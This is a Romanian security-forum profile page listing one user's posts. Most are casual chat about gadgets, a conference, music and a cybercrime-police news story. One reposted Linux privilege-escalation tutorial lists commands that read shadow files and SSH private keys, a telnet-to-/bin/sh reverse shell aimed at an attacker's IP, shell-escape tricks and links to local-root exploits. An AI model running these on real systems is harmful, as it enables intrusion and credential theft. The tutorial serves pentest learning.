-
Posts
638 -
Joined
-
Last visited
-
Days Won
6
Everything posted by co4ie
-
Mi-am bagat nasul acum prin G+ varianta mobile, pentru Android. Incercasem sa ma joc cu aplicatia asta chiar atunci cand s-a lansat, dar s-au jucat cei de la Google de-a va-ti-ascunselea cu ea. Aparea pe siteul G+, dar in market, nimic Asta e clipul lor de prezentare, sa vedeti cum arata: Va anunt din start ca era sa ma frig putin cu varianta mobile! La inceput te intreaba daca vrei sa-ti uploadeze pozele doar pe wifi, pe wifi si mobile networks sau sa-ti dea disable la upload automat. Obisnuita de Microsoft cu “click next” pana ti se face rau, tot dadeam acolo wifi, ok, contul meu de mail, ok, totul era ok! Dupa vreo 2 minute de procesare informatiei in backgroundul mintii mele… Stai. Cum upload automat? Deci el by default vrea sa-ti uploadeze toate pozele si clipurile pe care le faci cu telefonul pe G+. HELL NO!!! Daca ati dat ok, ca zombiul de mine, aveti butonul de “menu” si gasiti acolo setarile pentru “Instant upload”. Pe home screenul aplicatiei ai 5 iconite: Stream/ Messenger/ Photos/ Profile/ Circles. Pretty decent so far. Si apoi da click pe ceva. Orice! Nu stiu cum vi se pare voua, dar dupa pasul asta… Arata totul atat de bine, de clar, de curat, de logic, incat imi vine sa plang! It’s the stuff social media should be made of. As indrazni sa zic ca-mi place mai mult lookul aplicatiei mobile decat a site-ului original. On a different note, ma oftic de mor ca nu pot sa fac print screenuri. Zic de atata timp ca rootez nenorocirea asta, dar lenea-i mare… Si revenind! Stream: In afara de evidentele postari ale persoanelor din cercurile tale, ai si un checkin. Foarte frumusel si simplu si ala, iti detecteaza locatia si ai optiunea de a scrie un comment, sau atasa o poza si atat. Nu’s fan location apps, dar pe asta l-am incercat cu-n scop. In partea de sus apar doua optiuni: nearby si Incoming. Nearby iti afiseaza prietenii care posteaza aproape de locatia ta. Incoming… No idea! I had no freaking idea ce face incoming. And then I googled it And this gets interesting. Se pare ca incoming iti afiseaza posturile oamenilor care nu sunt in cercurile tale, dar care te-au adaugat pe tine in cercuri. Ideea lor e sa-i tina pe astia separati (nu ca Facebook, unde dai un accept si aia e). Insa sa ti-i mentina cumva in vedere, ca poate ai omis sa adaugi pe cineva interesant. And finding cool new people is what social media is about. Messenger (initial numit Huddle): Ma asteptam sa fie integrat GTalk-ul aici. But they played it smarter. Poti sa chat-uiesti cu oricine din address book-ul tau (incepi sa le tastezi numele/ mailul si apar cu autocomplete). Sau poti selecta cercuri intregi – la fel, incepi sa tastezi denumirea cercului. Tineti cont ca asta e messenger, nu streamul unde bagati update-uri. Deci nu deranjati lumea de-aiurea. Photos: Aici sunt 4 categorii: From your circles/ Photos of you/ Your albums/ From your phone. Aceleasi optiuni ca pe site-ul Google+, doar ca acolo cand intri in photos iti afiseaza automat pozele din prima categorie. Aici selectezi ce vrei sa vezi inainte. Ceea ce pentru mine functioneaza mai bine. Profile: Ai laic! Spre deosebire de app-ul de Facebook, unde nu poti sa editezi nimic (nu ai optiunea de a sterge ceva ce-ai postat, de a-ti editezi profilul, nimic!), aici poti sa faci ce vrea veverita ta. Bine, ca sa zic tot adevarul, nu poti edita toate informatiile de profil, dar macar poti sa-ti schimbi poza. Poti sa moderezi commenturi, sa stergi updateuri jenante pe care le-ai postat din greseala etc. Selectezi postul si ai in coltul din dreapta sus 3 punctulete, care reprezinta meniul/ optiunile. Circles: Daca te arde sa editezi ce prieteni ai in care cercuri, while on the go (nu stiu, esti in tren pentru 12 ore si te arde plictiseala), well.. Poti! De fapt singurul motiv serios pentru care Circles exista este ca dupa ce ti-ai organizat frumos cunostintele in cercuri (prieteni/ work/ people I ignore/ mai stiu eu ce) poti sa vizualizezi updateurile lor separat, pe fiecare cerc in parte. Which pretty much rulz, din motive usor de imaginat Ok, daca nu va imaginati ganditi-va ca poate nu vreti sa stie toata firma that you got shit faced cu oamenii din cercul “party peeps”. Acestea fiind zise, imi pare atat de bine ca Facebook face toate modificarile astea cretinoide. In felul asta poate migrati si voi mai rapid pe G+! Facebook is the new MySpace, e momentul sa ii faceti din batistuta si sa treceti mai departe. Momentan G+ mobile este available browser based cam pe orice. Insa aplicatii native sunt disponibile pentru Android (de la 2.1 in sus) si pentru iPhone (de la 4 in sus ). Sursa
-
Incearca ASTA ... nu stiu daca merge ca nu am java instalat si nu instalez numai pt asta... Sau daca nu AICI gasesti niste info... Mai poti incerca si asta : How to Download Videos From MegaVideo Everyone knows that YouTube has a serious competitor in the Internet market and its none other than MegaVideo. MegaVideo claims to beat YouTube with its new set of features and services. This service will let you make money online by just uploading and sharing videos and is itself a complete repository of online videos just like YouTube. Though MegaVideo is far from beating YouTube but people have already started using it to share great videos but the problem is that you cannot download MegaVideo videos unless you are a premium member. On the other hand we have services like Online YouTube Downloader which let you download a YouTube video instantly to your PC. Download Videos From MegaVideo However with this little trick bought to you by HelloGiri you can easily download and save MegaVideo videos to your computer and watch them offline whenever you like. 1 Open your MegaVideo video in your browser and let it load fully 2 After you are done watching the video online, go to Tools -> Internet Options -> Settings -> View Files (For IE) 3 Now you will get a large size file with long name and unknown type there 4 Copy and paste that file at desktop, this file is the video file in flv format 5 Rename it with flv extension, say e.g. MyMega.flv I have tested the trick myself and it works great. See the screen below to get an idea what the file looks like and where to look for it (I tested the trick on Internet Explorer)
-
DefCamp 2011 - prima conferinta de securitate din Romania
co4ie replied to Andrei's topic in Anunturi importante
sau fa ca mine... o zi de concediu... preferabil cu plata daca mai ai ! daca nu medical o zi sau zile ca mergi la doctor ca ai racit , ca ti-a murit la intrare sau ca ti-a murit pisica:)) By the way... pana la urma vin cu masina ... -
DefCamp 2011 - prima conferinta de securitate din Romania
co4ie replied to Andrei's topic in Anunturi importante
cu acceleratul ala o sa muriti fara priza pt laptop...sau poate va tine bateria:)) in functie de ce raspuns primesc azi...maine...ma decid si eu cu ce vin (totusi sper sa vin cu trenul)... (@Andrei: de asta nu am raspuns la mail...inca astept o confirmare...) -
eu nu am auzit de asa ceva:| nu cred ca e posibil sa transformi un router wifi in receiver... Intradevar din cate am vazut routerul tau are un receiver wifi ... dar cred ca poate fi folosit doar ca repetor de semnal...
-
DefCamp 2011 - prima conferinta de securitate din Romania
co4ie replied to Andrei's topic in Anunturi importante
pai nu ai pe cine anunta... iti aranjezi singur cazarea... mancarea.. iar cu intrarea la defcamp daca citeai ce sa postat ,adica: iti dadeai seama ca stii ce ai de facut!! pe site la Vila Bran scrie clar : 114 camere si 9 apartamente.Poti face o rezervare acolo ... asta in cazul in care mergi pe pielea ta...si (presupun ca asta se va cere in acel mail de care zicea Andrei..) ai confirmat prezenta chiar daca nu esti printre cei 50!! -
ei nu au vrut sa mai aiba treaba cu el... satelitii nu se mai intorc pe pamant decat in cazul in care se lovesc de alte ramasite din cosmos si deviaza de la orbita lor!!
-
Download AICI sivartech spyphone E aplicatia platita... vreo 3 euro pe market..
-
si ca improvizatie poti pune o folie de aluminiu peste o farfurie de unica folosinta din plastic si lipesti modemul pe spate, functioneaza ca o antena ... Am facut faza asta in caminele din Iasi si mi-a adus + 1 liniuta la semnal...
-
si eu am aceeasi oferta la cartela cosmote... de curand am cautat si eu sa imi fac abonament voce si net...Cea mai buna oferta am gasito la cosmote ... 6E voce si 8E 3gb trafic si dupa ce se termina platesti 0,03/mb la 7,1 mb/s .8E/3gb e extraoptiune deci iti trebuie abonament de voce ,daca nu cel mai ieftin abonament de net e 18E cu putini mb... Faza naspa e ca in toate retelele trebuie sa platesti traficul suplimentar,viteza scade si ai trafic nelimitat doar in cazut abonamentelor pt laptop!! Nu stiu ce aveti voi cu reteaua cosmote... eu m-am inteles bine cu ei si da... am avut abonamente in toate retelele...
-
NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF
co4ie replied to LLegoLLaS's topic in Exploituri
e bine ... vulnerabilitatea asta va ramane mult si bine!! Merci mult ! -
Intradevar.. gusturile nu se discuta... dar si mie mi se pare inutila distributia asta... zici ca are 500 mb? pai in backtrack numai msf,set,fasttrack si sapyto aduna 250mb... nu inteleg de ce sa alegi o distributie limitata la wifi mai ales ca iti poti face propriul script gen airoscript dupa gusturile tale si stralucesti mai tare decat "bijuteria coroanei"... in plus daca`ti place airoscript poti usor sa il instalezi si in backtrack , desi mi se pare ca satisfactia e mai mare daca faci cu mana ta si nu cu un script...
-
de rupt...nu pprea poti... poti sa o spargi .... intri pe pagina aia iei un ciocan cat mai mare si dai cu el in monitor (sa dai cat mai tare ca sa o spargi din prima) !!!
-
Reportaj din interiorul discretei unităţi a VÂNĂTORILOR INFORMATICI
co4ie replied to co4ie's topic in Stiri securitate
Micul fum cred ca , cauta doar afirmare si publicitate... fara sa stie ca asta vine cu ani de puscarie! Sa fim seriosi... daca faci totul ca la carte nu te prinde nimeni ... si cacatii astia de la brigada mortii sunt niste militari care stiu doar unde e escape`ul pe tastatura!! Am avut ocazia sa vb cu unul dintre ei (sau cel putin zicea ca e) si am constatat cu stupoare ca sunt niste glume de oameni care au pe mana tehnologii si echipamente pe care nu le inteleg deloc si in plus majoritatea calculatoarelor din sediile lor stau pe xp si daca le zici ceva de linux oamenii te injura !! Noi sa fim bucurosi ca traim in Romania si ca posturile de genul se ocupe pe criterii politice si nepotisme!! -
"Toat? lumea las? urme pe internet. Unii ?tiu s? le ?tearg?... dar tot fac o gre?eal?" Oamenii care l-au prins pe Micul Fum, hackerul care a spart conturile vedetelor TV. "Toat? lumea las? urme pe internet. Totul este s? le g?se?ti. Sunt unii care ?tiu s? ?i le ?tearg?…dar, în final, tot fac o gre?eal? ?i îi prindem", a declarat pentru gândul ?eful Serviciului de Combatere a Criminalit??ii Informatice (SCCI) din cadrul Inspectoratului General al Poli?iei Române (IGPR). În 2010 erau deschise 828 de cazuri de criminalitate informatic? în România, dintre care au fost finalizate 147. În total, au fost trimise în judecat? 616 persoane, care au comis 1.329 de infrac?iuni. "Putem vorbi ?i despre satisfac?ia profesional?, faptul c? îi prindem pe cei care încalc? legea, dar ?i de una personal?. Ca s? îi prinzi trebuie s? fii mai de?tept decât ei, trebuie s? î?i dai seama cum gândesc ?i ce gre?eli ar putea face. De cele mai multe ori e suficient s? fac? o gre?eal? ?i îi prindem", ne-a declarat el. Printre cele mai recente cazuri mediatizate la care a participat se num?r? ?i "Micul Fum", când o serie de vedete al trustului PRO au sesizat organele abilitate c? cineva are acces neautorizat la conturile lor de Facebook. "L-am prins în dou? luni, ceea ce, m?surat în timp, este foarte bine. A fost o provocare. E de?tept, ?i-a ?ters urmele. Dar tot a f?cut o gre?eal?", poveste?te ?eful SCCI. Cite?te ?i: Procurorii l-au arestat pe hackerul care a spart mailul mai multor vedete TV. Vezi cine este "Micul Fum" Toat? "vân?toarea" începe îns? cu o simpl? plângere. "Sesizarea ini?ial? conteaz? foarte mult. Cu cât este mai detaliat?, cu atât ne este mai u?or s? rezolv?m cazul mai repede", explic? el. Ulterior, în func?ie de natura plângerii, se poate merge la sediul respectivei companii sau la adresa persoanei respective, pentru a continua verific?rile. În cazul unui atac informatic, de exemplu, organele abilitate se deplaseaz? la locul respectiv, vorbesc cu administratorul re?elei, a serverelor, pentru a cunoa?te toate datele tehnice, astfel încât s? fie mai simplu de g?sit punctul vulnerabil folosit în atac. Se face inclusiv o list? cu toate persoanele care au acces, din interior, la serverele de date. Apoi urmeaz? conservarea ?i copierea datelor, pentru analizarea lor, precum ?i analizarea fi?ierelor de tip log, dac? exist?, în care se precizeaz? istoricul opera?iunilor derulate în acea re?ea sau pe acel server. Ulterior, în func?ie de natura infrac?iunii, organele abilitate aleg cea mai bun? strategie pentru a prinde infractorul. "El chiar credea c? va primi banii. Numai în filme mai vezi a?a ceva" "A mai fost un caz recent, prezentat ?i de media, în care a fost compromis? baza de date a unei companii. Nu a fost chiar simplu. Persoana respectiv? nu folosea telefonul mobil, accesa internetul de pe un mode wirelles… nu a fost u?or. Gravitatea faptei a fost cu atât mai mare cu cât a ?i perceput suma de 300.000 de euro în schimbul bazei de date, deci vorbim despre ?antaj", î?i aminte?te expertul SCCI. "El chiar credea c? va primi banii. Numai în filme mai vezi a?a ceva. Chiar se a?tepta s? se îmbog??easc? în acest fel. ?i l-am prins", a ad?ugat el, încercând s? î?i ascund? satisfac?ia evident?. În total, echipa "vân?torilor" de infractori informatici din cadrul IGPR este de 170 de persoane la nivel na?ional, dintre care 28 sunt "la centru", respectiv în Capital?. În ceea ce prive?te caracteristicile tehnice al echipamentelor folosite, oficialul SCCI a refuzat, politicos, s? dea detalii. "Avem ce ne trebuie pentru a-i prinde", a declarat el. SCCI se ocup? ?i de fraudele de tip skimming ?i phishing, nu numai de atacurile informatice. Atât când vine vorba despre skimming, respectiv compromiterea ATM-urilor sau POS-urilor, în sensul în care sunt montate dispozitive menite s? copieze datele de pe carduri cât ?i despre phishing, respectiv ob?inerea unor informa?ii confiden?iale despre posesorul unui card, prin intermediul internetului, expertul SCCI spune c? tendin?a este de sc?dere a num?rului de infrac?iuni, dup? cum rezult? din plângerile primite. Fraudele informatice la bancomate sunt în sc?dere, datorit? cardului cu cip "Nu avem cazuri de compromitere a unui POS în România. Acest lucru presupune s? ai acces facil la echipament. La skimming sunt probleme, dar în ultima perioad? fenomenul este în sc?dere. În trecut aveam 2-3 bancomate compromise la nivel na?ional pe s?pt?mân?, acum sunt 2-3 sesiz?ri pe lun?", ne-a declarat el. Explica?ia este folosirea din ce în ce mai intens? a cardurilor cu cip. "Informa?iile de pe banda magnetic? pot fi copiate, îns? cele de pe cip nu", a explicat el. În cazul phishing-ului, acesta are loc în România doar prin transmiterea de mesaje, dar ?i acest fenomen este în sc?dere, în principal tot datorit? securit??ii sporite a cardurilor. La nivel european îns?, ?i în SUA, fenomenul de phishing este destul de ridicat. În unele cazuri nu este vorba doar despre replicarea unui site cunoscut, de cele mai multe ori ale unor institu?ii financiare, pentru a copia datele personale ale utilizatorilor, ci despre infec?ii de tip malware. "Prime?ti mesajul, care con?ine un link, pe care, din diverse motive e?ti invitat s? îl accesezi. Apare apoi mesajul de desc?rcare a unui fi?ier executabil, care nu este altceva decât un malware, respectiv un program prin care cel care cineva poate ob?ine informa?ii personale de pe PC-ul celui infectat", ne-a explicat el. ?eful SCCI a precizat c? în România nu au fost semnalate astfel de atacuri. În ceea ce prive?te pierderile financiare în urma acestor atacuri, prejudiciul total ajunge la câteva milioane de euro. O cifr? exact? este îns? greu de estimat. "Banii nu au un traseu clar sau repetitiv. Instala?ia de skimming e f?cut? în România apoi e trimis? în Marea Britanie. Cardurile compromise acolo sunt folosite apoi în Asia sau în America pentru a scoate bani", ne-a declarat el, cu precizarea c? "avem o colaborare foarte bun? cu toate institu?iile sau organele abilitate din celelalte state pentru a-i depista, opri ?i trimite în judecat? pe ace?ti infractori". Sursa : Gandul.info
-
Da .. Nu contest faptul ca omul este un geniu .. Dar e mai mult este un geniu al marketingului decat altceva !! Din start dupa anuntarea retragerii actiunile Apple au inceput sa scada iar cei care au vandut nu erau oamenii de rand speriati ca o sa scada calitatea produselor (care dupa parerea mea este de 2.5 lei) ci brokeri care si-au dat seama ca vanzarile Apple fara Steve Jobs o sa scada drastic!! Parerea mea este ca Apple o sa se duca la fund.. incet dar sigur ! Asta daca nu cumva o sa gaseasca "The Next Best Thing" dar si asta fara Jobs la prezentare si marketing o sa fie un lucru greu de scos pe piata !
-
pyth0n3 presupun ca zicea sa pui un html online pe 91.210.107.20:80 ca si Index ... sa se vada ca sunt srv tale... Si inca o chestie... daca tu stii ca ai facut securizarea la srv...si zici ca ai facuto bine... noi iti facem tie pentest?sa vezi tu unde si daca ai gresit? Daca srv e securizat cat de cat calumea nu mi se pare challenge ... nu ai nici vulnerabilitati pe srv, porturile sunt inchise , numai la unu ai 80 deschis si nici un port msrpc nu e vulnerabil la psexec ... deci tu vrei pentest moca sau sau ne dai ceva cu ce sa lucram? macar ai vreo vulnerabilitate pe srv care e ascunsa bine si nu o gasim noi (in cazul asta ar fi fost challenge!!)?
-
Nu zic ca nu este muzica buna in romania... sau cel putin era... Nici nu are rost sa mai zic altceva.. De cand am vazut CTC in lista mau apucat toti dracii si nu am chef sa ma cert cu nimeni azi !
-
Basic Linux Privilege Escalation Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more "things" to look for. It's just a basic & rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you've to hunt for that "little thing" as "the devil is in the detail". Enumeration is the key. (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enumeration. Process - Sort through data, analyse and prioritisation. Search - Know what to search for and where to find the exploit code. Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box". Try - Get ready for (lots of) trial and error. Operating System What's the distribution type? What version? cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release What's the Kernel version? Is it 64-bit? cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- What can be learnt from the environmental variables? cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set Is there a printer? lpstat -a Applications & Services What services are running? Which service has which user privilege? ps aux ps -ef top cat /etc/service Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check! ps aux | grep root ps -ef | grep root What applications are installed? What version are they? Are they currently running? ls -alh /usr/bin/ ls -lah /sbin/ dpkg -l rpm -qa ls -lah /var/cache/apt/archivesO ls -lah /var/cache/yum/ Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ What jobs are scheduled? crontab -l ls -lah /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root Any plain text usernames and/or passwords? grep -i user [filename] grep -i pass [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla Communications & Networking What NIC(s) does the system have? Is it connected to another network? /sbin/ifconfig -a cat /etc/network/interfaces What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname What other users & hosts are communicating with the system? lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w Whats cached? IP and/or MAC addresses arp -e route /sbin/route -nee Is packet sniffing possible? What can be seen? Listen to live traffic # tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21 Have you got a shell? Can you interact with the system? # 7 Linux Shells Using Built-in Tools « LaNMaSteR53.blog nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP! Is port forwarding possible? Redirect and interact with traffic from another view # rinetd # Port-Forwarding With rinetd On Debian Etch | HowtoForge - Linux Howtos and Tutorials # fpipe # FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP] FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 # ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port # mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080) Is tunnelling possible? Send commands locally, remotely ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig Confidential Information & Users Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? id who w last cat /etc/passwd | cut -d: # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l What sensitive files can be found? cat /etc/passwd cat /etc/group cat /etc/shadow ls -lah /var/mail/ Anything "interesting" in the home directorie(s)? If it's possible to access ls -ahlR /root/ ls -ahlR /home/ Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg What has the user being doing? Is there any password in plain text? What have they been edting? cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history What user information can be found? cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root Can private-key information be found? cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key File Systems Which configuration files can be written in /etc/? Able to reconfigure a service? ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone What can be found in /var/ ? ls -lah /var/log ls -lah /var/mail ls -lah /var/spool ls -lah /var/spool/lpd ls -lah /var/lib/pgsql ls -lah /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases Any settings/files (hidden) on website? Any settings file with database information? ls -lahR /var/www/ ls -lahR /srv/www/htdocs/ ls -lahR /usr/local/www/apache22/data/ ls -lahR /opt/lampp/htdocs/ ls -lahR /var/www/html/ Is there anything in the log file(s) (Could help with "Local File Includes"!) cat /var/log/messages cat /var/log/secure cat /var/webmin/miniserv.log cat /var/log/cups/error_log cat /var/log/chttp.log cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log If commands are limited, you break out of the "jail" shell? python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i How are file-systems mounted? mount df -h Are there any unmounted file-systems? cat /etc/fstab What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search) # find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o+w -type d 2>/dev/null # world-writeable folders find / -perm -o+x -type d 2>/dev/null # world-executable folders find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders Any "problem" files? Word-writeable, "nobody" files find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files Preparation & Finding Exploit Code What development tools/languages are installed/supported? find / -name perl* find / -name python* find / -name gcc* find / -name cc How can files be uploaded? find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp Finding exploit code Exploits Database by Offensive Security 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team SecuriTeam.com SecurityFocus Exploit Search Engine Metasploit :: Browse Exploit & Auxiliary Modules SecurityReason.com - Our Reason is Security Full Disclosure Mailing List Google Finding more information regarding the exploit CVE security vulnerability database. Security vulnerabilities, exploits, references and more No Results Found ? Packet Storm[CVE] CVE - ERROR: Couldn't find ''[CVE] Vulnerability Details For[CVE] (Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk tarantula.by.ru/localroot/ Index of /file/local-root-exploit-priv9 Mitigations Is any of the above information easy to find? Try doing it! Setup a cron job which automates script(s) and/or 3rd party products Is the system fully patched? Kernel, operating system, all applications, their plugins and web services apt-get update && apt-get upgrade yum update Are services running with the minimum level of privileges required? For example, do you need to run MySQL as root? Scripts Can any of this be automated?! unix-privesc-check | pentestmonkey enum4linux - Portcullis Labs BASTILLE-LINUX Other (quick) guides & Links Enumeration Penetration Testing Methodology - 0DAYsecurity.com Hacking 3 Misc http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf insidetrust.com: A quick guide to Linux privilege escalation Tutorial By g0tmi1k ... ORIGINAL
-
What`s Tha Point? Ai 10 trupe cu 50 piese bune...in toata istoria hip-hop`ului underground romanesc !! Nu ai piese sa cante o zi fara sa se repete... FAIL !!! P.S. ... Doar parerea mea... don`t Hate !
-
Nine - Nine Livez (album) Nine - Cloud 9 (album) Wu tang ... tot ce poti Onyx ... tot ce poti ... Sticky Fingaz (Onyx) Albumele solo au cateva piese foarte bune Jedi Mind Tricks (Clasic old shit Instrumentalele sunt criminale !! ) IAM (Hip-Hop Francez Clasic 1996 ...) NTM (In Special... 4 my people Tot francez tot Clasic) Swollen Members Evidence (Lumea Zice ca seman cu el ) Blaq Poet MOP (Tot ce aveau inainte de 2004) Mobb Deep (Fucking hardcore) Daca mai vrei ... iti mai zic:)) Am o colectie ... cel putin impresionanta !!!
-
(11!)/(sqrt(11*11)) = 6 nu e corect... si nici eu nu cred ca exista rezolvare pt 11... pt 10 am avut si eu aceeasi rezolvare ca si demon_zone ! pt 11 de o juma de ora incerc si nu-mi ies decat ochii...
-
8-radical(radical(8+8))=6 sau 8!!/(8*8)=6 (!! e dublu factorial) (radical(9*9/9))!=6 si 9 a lui Skiddie e corect... 4 + 4 – radical4= 6 2+2+2=6 1 1 1 poate fi facut cu operatorii de incremetare ... ++1 + ++1 + ++1=6
-
E o usa banala din metal cu inchidere in 3 puncte ... Mascatii aia sunt atat de prosti incat nu-si dau seama ca mai bine loveasc la balamale ca sar mai usor !! Balamalele sunt din otel de 2 mm grosime, butucii de inchidere la usa sunt de 1,5-2 cm diametru !
-
Ceva monitoare >= 22" ??